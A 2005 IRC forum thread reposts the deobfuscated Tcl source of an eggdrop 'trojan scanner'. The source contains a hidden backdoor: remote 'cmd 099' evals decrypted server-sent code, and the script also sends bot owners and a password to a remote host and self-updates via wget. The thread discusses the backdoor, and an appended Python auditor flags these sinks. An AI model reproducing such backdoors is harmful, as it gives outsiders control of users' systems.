^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Thu May 19, 2005 5:47 am Post subject: encrypted trojan scan script (cont.) |
|
|
Due to the previous thread being screwed up by the long encrypted text line, I have reposted Sir_Fz's unencrypted script post here.
Sir_fz wrote: | Code: |
# -- flags
setudef flag aspbgbl
setudef flag aspbwarn
# -- strings
setudef str aspbkickmsg
setudef str detected
setudef str joins
setudef str kicked
# -- bindings
# - remove me
bind MSG -|- "REMOVEME" aspbgbl:remove:user
# - check for possible trojans onjoin
bind JOIN -|- "*" aspbgbl:check:user
# - update channels
bind PART -|- "*" aspbgbl:update:channels
# - update botname
bind NICK -|- "*" aspbgbl:update:nickname
# - script status
bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status
# - auto update
bind TIME -|- "00 * * * *" aspbgbl:update
# --- script main source - NEVER TOUCH IT ;)
# -- auto update aspbgbl
proc aspbgbl:update { minute hour day month year } {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
putdcc $idx "cmd=011 $::aspb(version)"
}
# -- trojan scan control panel
proc aspbgbl:status { nickname hostname handle channel arguments } {
global lastbind
if {[channel get $channel "aspbkickmsg"] == ""} {
channel set $channel aspbkickmsg $::aspb(default)
}
switch -exact -- [string tolower [lindex [split $arguments] 0]] {
"warn" {
set status "Bot will warn users."
if {![channel get $channel "aspbwarn"]} {
set status "Bot won't warn users."
}
switch -exact -- [string tolower [lindex [split $arguments] 1]] {
"on" {
putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
}
"off" {
putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
}
"default" {
putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
}
}
}
"stats" {
if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
putserv "NOTICE $nickname :No statistic available :("; return
}
putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"
}
"status" {
set status "aspb is enabled."
if {![channel get $channel "aspbgbl"]} {
set status "aspb is disabled."
}
switch -exact -- [string tolower [lindex [split $arguments] 1]] {
"on" {
putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
}
"off" {
putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
}
"default" {
putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
}
}
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
}
"kickmsg" {
if {[join [lrange [split $arguments] 1 end]] == ""} {
if {[channel get $channel "aspbkickmsg"] == ""} {
set kickmessage "not set"
} else {
set kickmessage [channel get $channel "aspbkickmsg"]
}
putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"
return
}
channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]
putserv "NOTICE $nickname :Kickmessage successfully saved."
}
"default" {
set status "aspb is enabled."
if {![channel get $channel "aspbgbl"]} {
set status "aspb is disabled."
}
putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"
}
}
}
# -- get command/result from the database
proc aspbgbl:database { idx arguments } {
if {![valididx $idx]} {
return
}
foreach argument $arguments {
if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
set $variable $value
}
}
if {![info exists cmd]} {
return
}
if {$cmd == "004"} {
if {![info exists type]} {
set type ""
}
channel set $chan detected [expr [channel get $chan "detected"] + 1]
channel set $chan kicked [expr [channel get $chan "kicked"] + 1]
if {![info exists reason] || [llength $reason] < 1} {
set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
}
set unban ""
foreach chanban [chanbans $chan] {
if {[lindex $chanban 2] >= 300} {
lappend unban [lindex $chanban 0]
}
if {[llength $unban] == "6"} {
putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
}
}
if {$unban == "" && [llength [chanbans $chan]] == "45"} {
set banid 0
while {$banid < 5} {
lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
}
}
putquick "KICK $chan $nick :$reason" -next
putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"
if {[channel get $chan "aspbwarn"] && $warn} {
putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
}
} elseif {$cmd == "099"} {
regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
} elseif {$cmd == "013"} {
if {![validchan $chan]} {
return
}
channel set $chan -aspbgbl
if {![info exists reason]} {
set reason "not given"
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
}
putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"
} elseif {$cmd == "010"} {
if {![info exists reason]} {
set reason "not given"
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
}
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
continue
}
channel set $chan -aspbgbl
putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"
}
} elseif {$cmd == "012"} {
if {[catch { exec wget $url } result]} {
if {![info exists changes]} {
set changes "not given"
} else {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
}
if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {
if {[file exists $::aspb(path)]} {
file delete -force $::aspb(path)
}
file rename -force $filename $::aspb(path)
if {[file exists $filename]} {
file delete -force $filename
}
set owners ""
foreach owner [userlist n] {
if {[hand2nick $owner] != ""} {
lappend owners [hand2nick $owner]
}
}
if {[llength $owners] > 0} {
putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
}
if {[array exists ::aspb]} {
array unset ::aspb
}
catch { killdcc $idx }
rehash
}
return
}
putlog "aspbgbl\002:\002 There is a new aspbgbl version available."
} elseif {$cmd == "009"} {
if {!$status} {
puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
}
puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."
set unbanned ""
foreach channel [channels] {
if {[channel get $channel "aspbgbl"]} {
foreach channelban [chanbans $channel] {
if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
}
}
}
}
if {[llength $unbanned] > 0} {
puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
}
} elseif {$cmd == "014"} {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message
if {![info exists message]} {
return
}
set list ""
foreach owner [userlist n] {
if {[set nick [hand2nick $owner]] != ""} {
lappend list $nick
}
}
putserv "PRIVMSG [join $list ","] :$message"
} elseif {$cmd == "015"} {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message
if {![info exists message]} {
return
}
set list ""
foreach channel [channels] {
if {[channel get $channel "aspbgbl"]} {
lappend list $channel
}
}
putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"
}
}
# -- remove a possible user
proc aspbgbl:remove:user { nickname hostname handle arguments } {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
putdcc $idx "cmd=008 $nickname!$hostname"
}
# -- update database information
proc aspbgbl:update:channels { nickname hostname handle channel reason } {
if {[isbotnick $nickname]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {[string equal -nocase $chan $channel]} {
continue
}
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
}
}
# -- update botname information
proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {
global nospam
if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
} elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
set nospam [unixtime]
}
}
# -- check for possible trojan on join
proc aspbgbl:check:user { nickname hostname handle channel } {
if {[isbotnick $nickname]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
return
}
channel set $channel joins [expr [channel get $channel "joins"] + 1]
if {[string match "*quakenet.org" $hostname]} {
return
} elseif {[matchattr $handle mno|mno $channel]} {
return
} elseif {![botisop $channel]} {
return
} elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
return
} elseif {![channel get $channel "aspbgbl"]} {
return
} elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
} elseif {[isbotnick $nickname]} {
return
}
if {[channel get $channel "aspbkickmsg"] == ""} {
channel set $channel aspbkickmsg $::aspb(default)
}
set idler 0
set operator 0
set voice 0
foreach user [chanlist $channel] {
if {[isop $user $channel]} {
incr operator 1
} elseif {[isvoice $user $channel]} {
incr voice 1
}
incr idler 1
}
putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"
}
# -- get idx for the aspbgbl database
proc aspbgbl:connection { address } {
foreach socket [dcclist] {
if {[string equal -nocase $address [lindex [split $socket] 2]]} {
return [lindex [split $socket] 0]
}
}
if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
return -1
}
set enabled ""
foreach channel [channels] {
if {![channel get $channel "aspbgbl"]} {
lappend enabled $channel
} else {
lappend enabled +$channel
}
}
putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
control $idx aspbgbl:database
return $idx
} |
|
_________________ The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
|
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Thu May 19, 2005 7:39 am Post subject: |
|
|
So I didn't need new glasses after all? Yay!  _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Thu May 19, 2005 8:39 am Post subject: |
|
|
Haha it took me a while to find the post it just looked like there was nothing till I scrolled over and down. Just doing my good deed for the day |
Thunderdome Op

Joined: 15 Mar 2005 Posts: 187
|
Posted: Thu May 19, 2005 9:01 am Post subject: |
|
|
How does this script work? I tried to read the code, but I don't understand what it does... |
ex Voice

Joined: 18 May 2005 Posts: 14 Location: Chicago
|
Posted: Thu May 19, 2005 10:41 am Post subject: |
|
|
it connects to a bot and on every join it asks whether it is a spamclient or not.
+ some additional features. |
metroid Owner
Joined: 16 Jun 2004 Posts: 771
|
Posted: Thu May 19, 2005 6:29 pm Post subject: |
|
|
Guys, I just happen to know who made this script and code gets obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malicious code in it, which I don't think there is.. |
greenbear Owner
Joined: 24 Sep 2001 Posts: 733 Location: Norway
|
Posted: Thu May 19, 2005 8:38 pm Post subject: |
|
|
that's just bullshit. it's distributed freely under the GNU licence. if he didn't want ppl to read it, he shouldn't have made it public. |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri May 20, 2005 3:43 am Post subject: |
|
|
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)
Besides, it's decrypting, the code is still the same. _________________ Follow me on GitHub
- Opposing
Public Tcl scripts |
^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Fri May 20, 2005 5:57 am Post subject: |
|
|
Sir_Fz wrote: | Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)
Besides, it's decrypting, the code is still the same. |
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public. |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Fri May 20, 2005 6:49 pm Post subject: |
|
|
I thought only Vulcans used logic?
Bravo one and all. |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri May 20, 2005 7:26 pm Post subject: |
|
|
I forgot to mention, that code was encrypted like 4 times lol. Every time I decrypted it, it showed me yet another encryption (was about to give up on it) maybe next time he should try encrypting it endlessly |
Galadhrim Op
Joined: 11 Apr 2003 Posts: 123 Location: Netherlands, Enschede
|
Posted: Sat May 21, 2005 4:41 am Post subject: |
|
|
maybe make a better decrypter that uses recursiveness. |
De Kus Revered One

Joined: 15 Dec 2002 Posts: 1361 Location: Germany
|
Posted: Sat May 21, 2005 9:42 am Post subject: |
|
|
^DooM^ wrote: | Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public. |
Since he distributed it under the GNU GPL it would be even illegal to make the source code inaccessible. _________________ De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright © 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens... |
Arie Voice
Joined: 18 Jul 2005 Posts: 1
|
Posted: Mon Jul 18, 2005 10:29 am Post subject: |
|
|
the part:
Code: | } elseif {$cmd == "099"} {
regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] } |
was a backdoor I heard - don't know Tcl =p |
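A way to review a script like this before loading it, as an added example that is not part of any post in this thread or of the script itself: find the procs that a `control` call attaches to a socket, then flag lines inside them where data from that socket can reach `eval`, `exec`, a variable name, or the script file. The rule names, regexes and the naive brace counting are assumptions of this sketch; the sample lines are copied from the posted script and trimmed.

```python
import re

# Constructed sample: lines copied from the script posted in this thread,
# trimmed to the socket handler and the proc that registers it.
SAMPLE = r'''
proc aspbgbl:database { idx arguments } {
foreach argument $arguments {
if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
set $variable $value
}
}
if {$cmd == "099"} {
regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
} elseif {$cmd == "012"} {
if {[catch { exec wget $url } result]} {
file rename -force $filename $::aspb(path)
rehash
}
}
}
proc aspbgbl:connection { address } {
set idx [connect $::aspb(address) $::aspb(port)]
control $idx aspbgbl:database
return $idx
}
'''

# Hypothetical rule set: constructs that let remote input drive the bot.
SINKS = {
    "eval of decrypted remote data": re.compile(r"\beval\s+\[[^\]]*\bdecrypt\b"),
    "shell exec with variable argument": re.compile(r"\bexec\s+\w+[^;\]]*\$\w+"),
    "variable name chosen by input": re.compile(r"\bset\s+\$\w+\s+\$\w+"),
    "script replaced or reloaded": re.compile(r"\bfile\s+rename\b|^\s*rehash\b"),
}

def audit(source):
    """Return (handlers, findings); a finding is (proc, line_no, label)."""
    # Procs named in `control <idx> <proc>` receive every line the peer sends.
    handlers = set(re.findall(r"^\s*control\s+\S+\s+(\S+)", source, re.M))
    findings, proc, depth = [], None, 0
    for no, line in enumerate(source.splitlines(), 1):
        m = re.match(r"\s*proc\s+(\S+)", line)
        if m and depth == 0:
            proc = m.group(1)
        depth += line.count("{") - line.count("}")  # naive: ignores quoted braces
        if proc in handlers:
            findings += [(proc, no, label)
                         for label, rx in SINKS.items() if rx.search(line)]
        if depth == 0:
            proc = None
    return handlers, findings

if __name__ == "__main__":
    for finding in audit(SAMPLE)[1]:
        print(finding)
```

Line numbers in the findings refer to the string passed to `audit`; a hit is a prompt for manual review of that line, not proof of intent.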